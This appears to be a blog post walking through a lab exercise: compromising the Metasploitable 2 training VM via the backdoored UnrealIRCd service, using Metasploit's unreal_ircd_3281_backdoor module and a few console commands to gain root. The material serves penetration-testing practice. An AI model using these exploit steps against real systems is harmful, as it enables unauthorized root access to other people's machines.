Metasploitable 2 – Compromise: UnrealIRC

Lets take a look at this Nmap result in more detail:

6667/tcp  open  irc         UnrealIRCd

Nessus results also show some details here:

Critical (10.0) 46882 UnrealIRCd Backdoor Detection

Worth checking to see if Metasploit has a module we can use here. Fire up Metasploit with:

msfconsole

And lets do a search for any hits on ‘unrealirc’:

search unrealirc

Metasploit_unrealirc

Great we have a hit, lets choose this exploit:

use exploit/unix/irc/unreal_ircd_3281_backdoor

use_unreal_exploit

We now need to configure it. To see what’s required, use:

show options

metasploit_unreal_show-options

Lets set our target (using our Metasploitable IP address) with:

set RHOST 192.168.168.134

Once done you can run ‘show options’ again to confirm it looks good:

metasploit_unrealirc_rhost

Now lets see if it works by typing ‘run’

run

Metasploit_unrealirc_exploit_run

Be aware that you may not get much feedback even if the exploit is successful.

Try typing ‘hostname’ as above and see what comes back. As you can see the exploit was successful, we have root access to the metasploitable box once more.

 

 

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s